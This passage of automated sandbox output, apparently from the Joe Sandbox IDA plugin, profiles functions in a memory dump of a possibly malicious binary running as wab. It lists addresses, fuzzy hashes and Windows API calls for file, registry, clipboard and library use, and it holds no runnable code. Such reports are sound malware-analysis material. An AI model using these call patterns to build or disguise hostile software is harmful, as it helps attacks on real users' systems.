                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                      APIs
                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                      APIs
                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                      APIs
                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                      APIs
                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                      APIs
                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                      APIs
                      • memset.MSVCRT ref: 004095FC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                      • String ID:
                      • API String ID: 3655998216-0
                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                      APIs
                      • memset.MSVCRT ref: 00445426
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                      • String ID:
                      • API String ID: 1828521557-0
                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                      APIs
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • memcpy.MSVCRT ref: 00406942
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@FilePointermemcpy
                      • String ID:
                      • API String ID: 609303285-0
                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID:
                      • API String ID: 2081463915-0
                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                      APIs
                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastRead
                      • String ID:
                      • API String ID: 2136311172-0
                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                      APIs
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@
                      • String ID:
                      • API String ID: 1936579350-0
                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                      APIs
                      • EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • GetLastError.KERNEL32 ref: 0040995D
                      • CloseHandle.KERNEL32(?), ref: 00409969
                      • GetLastError.KERNEL32 ref: 00409974
                      • CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                      • String ID:
                      • API String ID: 2565263379-0
                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                      APIs
                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                      APIs
                      • EmptyClipboard.USER32 ref: 00409882
                      • wcslen.MSVCRT ref: 0040988F
                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                      • memcpy.MSVCRT ref: 004098B5
                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                      • CloseClipboard.USER32 ref: 004098D7
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                      • String ID:
                      • API String ID: 2014503067-0
                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                      APIs
                      • GetLastError.KERNEL32 ref: 004182D7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                      • LocalFree.KERNEL32(?), ref: 00418342
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                      • String ID: OsError 0x%x (%u)
                      • API String ID: 403622227-2664311388
                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                      APIs
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • OpenClipboard.USER32(?), ref: 00411878
                      • GetLastError.KERNEL32 ref: 0041188D
                      • DeleteFileW.KERNEL32(?), ref: 004118AC
                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                        • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                        • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                      • String ID:
                      • API String ID: 1203541146-0
                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID:
                      • API String ID: 1865533344-0
                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                      APIs
                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: NtdllProc_Window
                      • String ID:
                      • API String ID: 4255912815-0
                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                      APIs
                      • _wcsicmp.MSVCRT ref: 004022A6
                      • _wcsicmp.MSVCRT ref: 004022D7
                      • _wcsicmp.MSVCRT ref: 00402305
                      • _wcsicmp.MSVCRT ref: 00402333
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • memset.MSVCRT ref: 0040265F
                      • memcpy.MSVCRT ref: 0040269B
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memcpy.MSVCRT ref: 004026FF
                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                      Strings
                      Memory Dump Source
